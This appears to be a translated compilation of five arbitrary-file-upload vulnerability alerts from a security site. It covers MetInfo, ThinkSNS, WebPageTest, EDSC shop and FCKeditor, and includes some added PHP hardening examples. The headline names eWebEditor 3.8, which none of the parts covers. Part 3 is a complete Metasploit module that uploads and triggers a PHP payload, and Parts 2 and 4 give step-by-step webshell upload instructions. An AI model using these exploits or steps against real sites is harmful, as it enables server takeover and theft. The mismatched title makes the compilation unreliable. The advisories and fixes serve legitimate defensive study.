eWebEditor 3.8 for PHP Arbitrary File Upload EXP Vulnerability Alert

Author: 栖诚

The following five articles on arbitrary file upload vulnerabilities were collected under the eWebEditor 3.8 for PHP arbitrary file upload EXP vulnerability alert and contributed by 栖诚.


Part 1: MetInfo v5.1.3 Arbitrary File Upload Vulnerability Alert

On the 23rd MetInfo released version 5.1.5, which patches the vulnerability described here; strictly speaking it is an arbitrary variable overwrite vulnerability.

PS: reposting in any form is welcome; first published on t00ls.net.

Note: do not use the content of this article for any illegal activity; you bear the consequences yourself.

Author: my5t3ry

Without further ado, the code:

include/common.inc.php, lines 20-39:

    $db_settings = parse_ini_file(ROOTPATH.'config/config_db.php');
    @extract($db_settings);
    require_once ROOTPATH.'include/mysql_class.php';
    $db = new dbmysql;
    $db->dbconn($con_db_host, $con_db_id, $con_db_pass, $con_db_name);
    define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
    isset($_REQUEST['GLOBALS']) && exit('Access Error');
    require_once ROOTPATH.'include/global.func.php';
    foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
        foreach ($$_request as $_key => $_value) {
            $_key{0} != '_' && $$_key = daddslashes($_value);
        }
    }
    $query = "select * from {$tablepre}config where name='met_tablename' and lang='metinfo'";
    $mettable = $db->get_one($query);
    $mettables = explode('|', $mettable[value]);
    foreach ($mettables as $key => $val) {
        $tablename = 'met_'.$val;
        $$tablename = $tablepre.$val;
    }

MetInfo queries the {$tablepre}config table in the database and, in a foreach loop, initializes the table-name variables from the result. The $tablepre in that query is itself initialized by

    $db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);

and the system then queries the database with SQL such as "SELECT * FROM $met_message where id=$id and lang='$lang'", where $met_message is one of the variables initialized by the foreach loop above.

Overwriting the $tablepre variable makes the table-name initialization fail, after which the table-name variables themselves can be supplied in the request.

I found an admin upload page; by overwriting variables I bypassed the admin authentication check and overwrote the list of allowed upload extensions, producing an upload vulnerability.

EXP: arbitrary file upload (screenshot)
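The root cause above is that the request-registration loop only refuses keys beginning with an underscore, so a parameter named tablepre or met_message can replace a variable that was set from config_db.php. As an added example (not MetInfo's code) of the check a fixed loop needs, the version below refuses to overwrite any variable that already exists and additionally blocks the protected names and prefixes; the daddslashes() helper is assumed to be MetInfo's and is stubbed here.

```php
<?php
// Added example, not MetInfo's code: a hardened replacement for the
// request-variable registration loop in include/common.inc.php. The original
// loop only skipped keys beginning with '_', so ?tablepre=x or ?met_message=y
// could replace variables set earlier from config_db.php.

// Stand-in for MetInfo's daddslashes() helper (assumed, not the real one).
function daddslashes_stub($value) {
    return is_array($value) ? array_map('daddslashes_stub', $value) : addslashes($value);
}

// Names that must never come from the request, and prefixes of the DB config
// keys (con_db_*) and of the table-name variables (met_*); the latter are
// created after this loop runs, so the "already exists" test cannot catch them.
$PROTECTED_NAMES    = array('tablepre', 'db_settings', 'db', 'query', 'mettable', 'mettables');
$PROTECTED_PREFIXES = array('met_', 'con_db_');

// Registers request parameters as globals and returns the keys it refused.
function register_request_vars(array $sources, array $names, array $prefixes) {
    $rejected = array();
    foreach ($sources as $source) {
        foreach ($source as $key => $value) {
            $key = (string)$key;
            $blocked = !preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $key) // identifier-like, no '_' prefix
                    || in_array(strtolower($key), $names, true)
                    || array_key_exists($key, $GLOBALS);             // never overwrite an existing variable
            foreach ($prefixes as $p) {
                if (stripos($key, $p) === 0) { $blocked = true; }
            }
            if ($blocked) { $rejected[] = $key; continue; }
            $GLOBALS[$key] = daddslashes_stub($value);
        }
    }
    return $rejected;
}

// Constructed demonstration: values that config_db.php would have set, then a
// request that tries to replace them alongside one legitimate parameter.
$tablepre    = 'met_';
$con_db_name = 'metinfo';
$rejected = register_request_vars(
    array(array('tablepre' => 'x', 'met_message' => 'evil', '_foo' => '1', 'id' => '5')),
    $PROTECTED_NAMES, $PROTECTED_PREFIXES
);
var_dump($tablepre, $GLOBALS['id'], $rejected);
```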

Part 2: ThinkSNS, Another Arbitrary File Upload Vulnerability Alert

One module does not validate the type of uploaded files, so arbitrary files can be uploaded.

Location of the vulnerable code:

apps/wap/Lib/Action/IndexAction.class.php

line 263

    if (!empty($_FILES['pic']['name'])) { // automatically post an image microblog
        $data['pic']     = $_FILES['pic'];
        $data['content'] = '图片分享';
        $data['from']    = $this->_type_wap;
        $res = api('Statuses')->data($data)->upload();
    }

The file type is not filtered.

Visit the wap module.

Post a microblog with an attached image.

Get the image address with Firebug.

Remove the small_ prefix and visit:

www.myhack58.com/data/uploads//1023/17/50865d481c217.php

Fix:

The upload type must be checked.
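As an added example (not ThinkSNS's code) of what "check the upload type" means for the branch above, the handler below validates a $_FILES entry by extension whitelist, content sniffing and image parsing before moving it under a server-chosen name. It assumes image-only uploads and that the upload directory is served with script execution disabled; $uploadDir is a placeholder.

```php
<?php
// Added example, not ThinkSNS's code: the file-type checks the wap upload
// path above lacks. Assumes image-only uploads (the feature posts an image
// microblog) and that $uploadDir is served with script execution disabled,
// since a valid image can still carry PHP inside it.

function validate_image_upload(array $file, $maxBytes = 2097152) {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return array(false, 'upload error');
    }
    if ($file['size'] > $maxBytes) {
        return array(false, 'too large');
    }
    // 1. Extension whitelist mapped to the MIME type it must have.
    $allowed = array('jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                     'png' => 'image/png',  'gif'  => 'image/gif');
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return array(false, 'extension not allowed');
    }
    // 2. Content sniff: the bytes on disk must match the claimed extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) {
        return array(false, 'content does not match extension');
    }
    // 3. It must actually parse as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        return array(false, 'not an image');
    }
    // 4. Never reuse the client-supplied name: a random name with the single
    //    whitelisted extension defeats names such as "shell.php.jpg".
    return array(true, bin2hex(random_bytes(16)) . '.' . $ext);
}

function store_upload(array $file, $uploadDir) {
    list($ok, $result) = validate_image_upload($file);
    if (!$ok) {
        error_log('upload rejected: ' . $result);   // log the reason, do not echo it
        return false;
    }
    // 5. Only a file that arrived through an HTTP upload may be moved.
    if (!is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    $dest = rtrim($uploadDir, '/') . '/' . $result;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : false;
}
// Use in the vulnerable branch: $path = store_upload($_FILES['pic'], $uploadDir);
```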

Part 3: WebPageTest Arbitrary PHP File Upload Vulnerability Alert

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    #   metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info={})
        super(update_info(info,
          'Name'           => "WebPageTest Arbitrary PHP File Upload",
          'Description'    => %q{
              This module exploits a vulnerability found in WebPageTest's Upload Feature. By
            default, the resultimage.php file does not verify the user-supplied item before
            saving it to disk, and then places this item in the web directory accessible by
            remote users. This flaw can be abused to gain remote code execution.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'dun',     #Discovery, PoC
              'sinn3r'   #Metasploit
            ],
          'References'     =>
            [
              ['OSVDB', '83822'],
              ['EDB', '19790']
            ],
          'Payload'        =>
            {
              'BadChars' => "\x00"
            },
          'DefaultOptions'  =>
            {
              'ExitFunction' => "none"
            },
          'Platform'       => ['php'],
          'Arch'           => ARCH_PHP,
          'Targets'        =>
            [
              ['WebPageTest v2.6 or older', {}]
            ],
          'Privileged'     => false,
          'DisclosureDate' => "Jul 13 2012",
          'DefaultTarget'  => 0))

        register_options(
          [
            OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
          ], self.class)
      end

      def check
        peer = "#{rhost}:#{rport}"
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")

        res1 = send_request_raw({'uri'=>"#{base}/index.php"})
        res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})

        if res1 and res1.body =~ /WebPagetest - Website Performance and Optimization Test/ and
          res2 and res2.code == 200
          return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
      end

      def on_new_session(cli)
        if cli.type != "meterpreter"
          print_error("No automatic cleanup for you. Please manually remove: #{@target_path}")
          return
        end

        cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
        cli.fs.file.rm(@target_path)
        print_status("#{@target_path} removed")
      end

      def exploit
        peer = "#{rhost}:#{rport}"
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")

        p = payload.encoded
        fname = "blah.php"

        data = Rex::MIME::Message.new
        data.add_part(
          'multipart/form-data',   #Content Type
          nil,                     #Transfer Encoding
          "form-data; name=\"file\"; filename=\"#{fname}\""   #Content Disposition
        )

        print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => "#{base}/work/resultimage.php",
          'ctype'  => "multipart/form-data; boundary=#{data.bound}",
          'data'   => data.to_s
        })

        if not res
          print_error("#{peer} - No response from host")
          return
        end

        @target_path = "#{base}/results/#{fname}"
        print_status("#{peer} - Requesting #{@target_path}")
        res = send_request_cgi({'uri'=>@target_path})
        handler

        if res and res.code == 404
          print_error("#{peer} - Payload failed to upload")
        end
      end
    end

Part 4: EDSC Online Shop V2.1 Arbitrary File Upload Vulnerability Alert

This vulnerability is quite old, but I searched online and found nobody mentioning it, so I am publishing it to share with everyone.

I am not a programmer, so I cannot explain the code side; please excuse that!

Online shop ED-SC V2.1

Default admin path: www.xxx.com/admins

Default upload path: www.xxx.com/admins/upfile_flash.asp

There are many other defaults, but these two are enough; in fact, finding the path to /upfile_flash.asp is all that is needed.

Let me write up the exploitation process, otherwise many friends as inexperienced as I am will not follow it.

Since this is an upload vulnerability, 明小子 naturally makes an appearance.

Just upload directly with 明小子.

Upload path: www.xxx.com/admins/upfile_flash.asp

It reports that the upload succeeded; then visit the shell address www.xxx.com/admins/diy.asp.

Part 5: FCKeditor FileUpload() Function Arbitrary File Upload Vulnerability Alert

Affected version:

FCKeditor 2.6.8

Description:

BUGTRAQ ID: 56735. FCKeditor is an open-source HTML text editor. FCKeditor 2.6.8 and other versions have a security vulnerability in the implementation of the 'FileUpload()' function; an attacker can exploit it to upload arbitrary files to the affected computer.

<* Reference: Mostafa Azizi *>

Security advice:

Vendor patch: FCKeditor. The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version: www.fckeditor.net/
